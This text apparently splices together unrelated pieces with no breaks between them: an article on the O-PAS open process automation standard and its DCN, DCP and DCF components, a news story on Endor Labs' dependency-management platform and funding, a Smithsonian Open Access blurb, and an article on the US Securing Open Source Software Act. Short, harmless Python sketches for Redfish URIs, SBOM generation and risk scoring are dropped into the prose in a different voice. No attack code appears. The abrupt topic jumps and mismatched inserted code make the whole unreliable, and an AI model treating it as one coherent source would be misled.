Distributed control platform (DCP): A DCP is the hardware and standard software interfaces required in all DCNs. The standard software interfaces are a common platform on top of which control software programs run. This provides the physical infrastructure and interchangeability capability so end users can use control software and hardware from multiple suppliers.
Distributed control framework (DCF): A DCF is the standard set of software interfaces that provides an environment for executing applications, such as control software. The DCF is a layer on top of the DCP that provides applications with a consistent set of O-PAS related functions no matter which DCN they run in. This is important for creating an efficient marketplace for O-PAS applications.
OPAS connectivity framework (OCF): The OCF is a royalty-free, secure, and interoperable communication framework specification. In O-PAS Version 1, the OCF uses OPC UA.
Advanced computing platform (ACP): An ACP is a computing platform that implements DCN functionality but has scalable computing resources (memory, disk, CPU cores) to handle applications or services that require more resources than are typically available on a small profile DCP. ACPs may also be used for applications that cannot be easily or efficiently distributed. ACPs are envisioned to be installed within on-premises servers or clouds.
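To make the relationships among these elements concrete, they can be sketched as a toy object model; the class and field names here are our own shorthand for illustration, not definitions from the standard:

```python
from dataclasses import dataclass, field

@dataclass
class DCP:
    """Distributed control platform: hardware plus standard software interfaces."""
    vendor: str
    cpu_cores: int = 1

@dataclass
class DCN:
    """Distributed control node: a DCP hosting a DCF that talks on the OCF."""
    name: str
    platform: DCP
    io_channels: int = 0                      # allowable I/O density is not yet settled
    apps: list = field(default_factory=list)  # control software run by the DCF

@dataclass
class ACP(DCN):
    """Advanced computing platform: DCN functionality with scalable resources."""
```

In this sketch an ACP is simply a DCN with more headroom, which is why it subclasses DCN, and decoupling shows up as the ability to pair any vendor's DCP with any control application.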
Within the OPAS Standard, DCNs represent a fundamental computing building block (figure 3). They may be hardware or virtual (when virtual they are shown as a DCF as in figure 2), big or small, with no I/O or various amounts. At the moment, allowable I/O density per DCN is not settled, so standardization efforts in conjunction with market forces may drive the final configuration.
DCNs also act as a gateway to other networks or systems, such as legacy systems, wireless gateways, digital field networks, I/O, and controllers like DCS or PLC systems. Industrial Internet of Things (IIoT) devices can also be accessed via any of these systems.
Figure 2. OPAS establishes a system architecture organizing process automation elements into interoperable groupings.
End users today must work with and integrate multiple systems in almost every process plant or facility. Therefore, the OPAS Standard was designed so users can construct systems from components and subsystems supplied by multiple vendors, without requiring custom integration. With the OPAS Standard it becomes feasible to assimilate multiple systems, enabling them to work together as one OPAS-compliant whole. This reduces work on capital projects and during the lifetime of the facility or plant, leading to a lower total cost of ownership.
By decoupling hardware and software and employing an SOA, the necessary software functions can be situated in many different locations or processors. Not only can software applications run on any of the hardware, but they can also access any I/O, increasing flexibility when designing a system.
One set of components can be used to create many different systems using centralized architectures, distributed architectures, or a hybrid of the two. System sizes may range from small to large and can include best-in-class elements of DCS, PLC, SCADA, and IIoT systems and devices as needed.
Information technology (IT) can also be incorporated deeper into industrial automation operational technology (OT). For example, DMTF Redfish is an IT technology for securely managing data center platforms. OPAF is adopting this technology to meet OPAS system management requirements.
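Redfish models platform management as a RESTful API rooted at the well-known path `/redfish/v1`, with standard top-level collections such as `Systems`, `Chassis`, and `Managers`. A small sketch of how a system manager might address managed nodes (the hostnames are illustrative, and a real client would authenticate and issue HTTPS requests):

```python
# Well-known Redfish service root and standard top-level collections
# (per DMTF's Redfish specification).
REDFISH_ROOT = "/redfish/v1"
COLLECTIONS = ("Systems", "Chassis", "Managers")

def collection_uris(host):
    """Map each standard collection to its URI on a managed node."""
    return {c: f"https://{host}{REDFISH_ROOT}/{c}" for c in COLLECTIONS}

def system_uri(host, system_id):
    """URI of one ComputerSystem resource, e.g. a DCN's management view."""
    return f"https://{host}{REDFISH_ROOT}/Systems/{system_id}"
```

Because these paths are the same regardless of vendor, a single management tool can monitor hardware from many suppliers, which is exactly the property O-PAS system management is after.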
Each industrial automation supplier offers a variety of devices and systems, most of which are proprietary and incompatible with similar products from other vendors and sometimes with earlier versions of their own products. End users and system integrators trying to integrate automation systems of varying vintages from different suppliers therefore have a challenging job.
To address these issues, OPAF is making great strides toward assembling a comprehensive, open process automation standard. Partially built on other established industry standards, and extending to incorporate most aspects of industrial automation, the O-PAS Standard will greatly strengthen interoperability among industrial automation systems and components. This will lower implementation and support costs for end users, while allowing vendors to innovate around an open standard.
For more information on OPAS Version 1.0, please download the standard at https://publications.opengroup.org/p190. Submit feedback by emailing email@example.com.
Figure 3. DCNs are conceived as modular elements containing DCP (hardware) and DCF (software), both of which are used to interface field devices to the OCF.
When it comes to creating applications, most developers have a secret weapon to innovate at pace: open-source software. Research shows that open-source libraries and components make up more than 75% of the code in the average software application, with the average software application depending on more than 500 components.
While these open-source dependencies are convenient, they also present new vulnerabilities that threat actors can exploit. For instance, injecting malware into a popular open-source project has the potential to affect thousands of downstream users.
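The scale of those dependencies is easy to measure in any Python environment using only the standard library; this sketch counts the requirements each installed distribution declares:

```python
from importlib import metadata

def dependency_counts():
    """Map each installed distribution to the number of requirements it declares."""
    counts = {}
    for dist in metadata.distributions():
        counts[dist.metadata["Name"]] = len(dist.requires or [])
    return counts
```

Summing these counts still understates the true transitive total, since each requirement pulls in requirements of its own.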
In an attempt to increase enterprise visibility over open-source software components, today Endor Labs came out of stealth with a Dependency Lifecycle Management Platform and $25 million in seed funding.
The new solution provides developers with a tool to evaluate, maintain, and update the dependencies used in their environments.
The announcement comes as more and more organizations are committing to securing the software supply chain following President Biden’s Executive Order On Improving the Nation’s Cybersecurity.
The order called for software vendors selling solutions to the government to maintain a software bill of materials (SBOM) and automated vulnerability scanning. Fundamentally, the order recognized that the spiraling complexity of open-source components needed to be addressed to get the threat landscape under control.
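At its simplest, an SBOM is a machine-readable inventory of component names and versions. The sketch below builds a dictionary in the spirit of the CycloneDX JSON format, trimmed to the basics rather than a fully validated document:

```python
import json

def make_sbom(components):
    """components: iterable of (name, version) pairs -> CycloneDX-style dict."""
    return {
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "components": [
            {"type": "library", "name": name, "version": version}
            for name, version in components
        ],
    }

# Serialize for a vendor to ship alongside a release.
sbom_json = json.dumps(make_sbom([("log4j-core", "2.17.1")]), indent=2)
```

Given such an inventory, automated scanning reduces to joining the component list against a vulnerability database, which is why the executive order pairs the two requirements.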
“Eighty percent of the code in modern applications is code your developers didn’t write but depend on through open-source packages. When our founding team was leading the Prisma Cloud engineering group at Palo Alto Networks, we realized the true magnitude of this issue,” said Varun Badhwar, cofounder and CEO of Endor Labs.
“Having previously created the cloud security posture management (CSPM) category, this team knows how to take on next-generation threats. Our mission is to enable OSS [open-source software] to live up to its true potential without introducing unnecessary risk. It’s exciting to once again take a new approach to the market, and we believe these solutions will radically enhance application development everywhere,” Badhwar said.
In an era where the U.S. government is calling on enterprises to produce SBOMs and increase the maturity of open-source security, Endor Labs offers a solution to monitor dependencies and increase transparency over how they’re used throughout the organization to build an accurate SBOM.
Instead of just pointing out insecure dependencies, Endor Labs also enables users to pick dependencies that are less vulnerable to compromise.
Traditionally, organizations use software composition analysis (SCA) tools to analyze applications and detect open-source software. SCA tools can check the security of the code used in critical applications. Researchers estimated the software composition analysis market would reach $398.4 million by 2022.
One of the main vendors in this market is Snyk, whose Snyk Open Source tool automatically monitors projects and code for vulnerabilities with the assistance of open-source vulnerability intelligence, while offering real-time reporting capabilities to support GRC teams.
Snyk most recently raised $530 million as part of a series F funding round in 2021, bringing its total valuation to $8.5 billion.
Another significant competitor is Synopsys with Black Duck, which combines multifactor open-source detection and a KnowledgeBase of over 4 million components to increase transparency over applications and containers to offer automated vulnerability notifications, reports that detail severity, and more.
Synopsys recently announced raising $1.25 billion in revenue for Q3 FY 2022.
However, Badhwar argues that Endor Labs differentiates itself from SCA tools based on its ability to help select secure and high-quality dependencies. Traditional SCA tools offer limited context on how dependencies are used and potential alternatives.
Welcome to Smithsonian Open Access, where you can download, share, and reuse millions of the Smithsonian’s images—right now, without asking. With new platforms and tools, you have easier access to more than 4.4 million 2D and 3D digital items from our collections—with many more to come. This includes images and data from across the Smithsonian’s 19 museums, nine research centers, libraries, archives, and the National Zoo.
What will you create?
Remixes by: Access Smithsonian, Amazon Web Services-Sumerian, Amy Karle, An Open Book Foundation, AstroNuts, Autodesk Tinkercad, Cesium, Chris Funk & N M Bodecker Foundation, Creative Commons, Duke University-MorphoSource, Georgetown University Maker Hub in Lauinger Library, Google Arts & Culture, The Khronos Group, MHz Foundation, Michael Joo, Matthew Putman, and James J. Williams III, Sketchfab, Smithsonian Center for Learning and Digital Access, Smithsonian Data Science Lab, Smithsonian Libraries & Museum in a Box, Wikimedia DC
The Smithsonian Open Access launch event is presented in partnership with:
Data hosting provided by AWS Public Dataset Program
There's at least one thing Republicans and Democrats can agree on in the US Senate: the importance of open-source software. Seriously.
As US Senator Gary Peters (D-MI) said last week, "Open-source software is the bedrock of the digital world." His partner across the aisle, Rob Portman (R-OH), agreed, saying, "The computers, phones, and websites we all use every day contain open-source software that is vulnerable to cyberattack."
Therefore, "The bipartisan Securing Open Source Software Act [PDF] will ensure that the US government anticipates and mitigates security vulnerabilities in open-source software to protect Americans' most sensitive data."
This bill proposes that since the Log4j security blow-up in 2021, and its continuing aftershocks, showed just how vulnerable we are to open-source code attacks, the Cybersecurity and Infrastructure Security Agency (CISA) must help "ensure that open-source software is used safely and securely by the federal government, critical infrastructure, and others."
After all, the Sept. 22 government release introducing the legislation added, "The overwhelming majority of computers in the world rely on open-source code." This is far from the first time that the federal government has taken note of just how vital open-source software has become to everyone. In January, the US Federal Trade Commission warned it would punish companies that don't fix their Log4j security problems.
The US government has long supported open-source software. For example, all the way back in 2000, the National Security Agency helped create Security-Enhanced Linux (SELinux). And, in 2016, then-US Chief Information Officer Tony Scott proposed a pro-open-source coding policy that required any "new software developed specifically for or by the federal government to be made available for sharing and reuse across federal agencies. It also includes a pilot program that will result in a portion of that new federally funded custom code being released to the public."
The Securing Open Source Software Act, however, moves open source from the realm of policy and regulation decisions into federal law. This bill will direct the CISA to develop a risk framework to evaluate how open-source code is used by the federal government. The CISA would also decide on how the same framework could be used by critical infrastructure owners and operators.
According to the Open Source Security Foundation (OpenSSF) in its analysis of the Act, the "CISA would produce an initial assessment framework for handling open-source code risk, incorporating government, industry, and open-source community frameworks and best practices from software security."
In short, the CISA would not try to reinvent the wheel, instead using the best of existing open-source security techniques. This follows in the footsteps of President Joseph Biden's Executive Order on Improving the Nation's Cybersecurity, which stated that developers must provide "a purchaser with an SBOM [Software Bill of Materials] for each application."
The Act will also require the CISA to identify ways to mitigate open-source software risks. To make that happen, it requires the CISA to hire open-source developers to address security issues. It also proposes that some Federal agencies start Open Source Program Offices (OSPO). Finally, it will require the Office of Management and Budget (OMB) to fund a CISA software security subcommittee and issue federal guidance on how users can secure open-source software.
People who follow open-source security closely have heard much of this before. As the OpenSSF noted, "Some of the ideas sound familiar to us -- for example, the use of SBOMs, the importance of security practices of development, build, and release processes, and a call for a risk assessment framework [echo] our Risk Assessment Dashboard stream from our Mobilization Plan."
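In practice, a risk assessment framework of the kind the bill envisions tends to reduce to a weighted score over observable signals about each dependency. The factors and weights below are entirely illustrative, not CISA's or OpenSSF's:

```python
def risk_score(known_cves, days_since_release, maintainer_count):
    """Toy 0-100 score: more CVEs, staler releases, fewer maintainers -> riskier."""
    cve_term = min(known_cves * 15, 50)                      # vulnerability history
    staleness_term = min(days_since_release / 365 * 10, 30)  # abandonment signal
    bus_factor_term = 20 if maintainer_count < 2 else 0      # single-maintainer risk
    return min(cve_term + staleness_term + bus_factor_term, 100)
```

The hard part is not the arithmetic but the data: as the Log4j review found, there is no authoritative source for many of these signals, so any real framework has to state how they are collected.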
But, surprisingly, the bill misses other points. For example, all software, not just open source, should be checked for potential risk. As Brad Arkin, Cisco's SVP and chief security and trust officer, testified to Congress about Log4J: "Open-source software did not fail, as some have suggested, and it would be misguided to suggest that the Log4j vulnerability is evidence of a unique flaw or increased risk with open-source software. The truth is that all software contains vulnerabilities due to inherent flaws of human judgment in designing, integrating, and writing software."
Still, imperfect as the bill may be, the OpenSSF says it is "committed to collaborating and working both upstream and with existing communities to advance open source security for all. We look forward to collaborating with policymakers around the world to strengthen the security of the software we all depend on."
The OpenSSF isn't the only group that's willing to work with the government to fundamentally strengthen open-source security but also has concerns. Open Source Initiative (OSI) US Policy Director Deb Bryant worries Congress is "building a framework which is targeted to treat open source as a special class of software instead of solving it for all of software."
Heather Meeker, a well-known open-source lawyer and OSS Capital general partner, more optimistically added, "It's good to see a bipartisan effort to strengthen management of security in software infrastructure -- including open-source software. The private market has long clamored for this improvement, via customer demands and expectations for software and cloud services vendors. But government oversight may help accelerate improvement efforts outside of commercial vendor arrangements, or in situations where vendor market power allows vendors to push back against customer demands."
Of course, just because a bill reaches Congress doesn't mean it will become law. Still, its committee advanced the bill to the Senate floor on Sept. 29. That's very fast for any bill on any issue. If it makes it through Congress, there seems no doubt that Biden will sign it into law. With luck, securing open-source software will become the law of the land in 2023.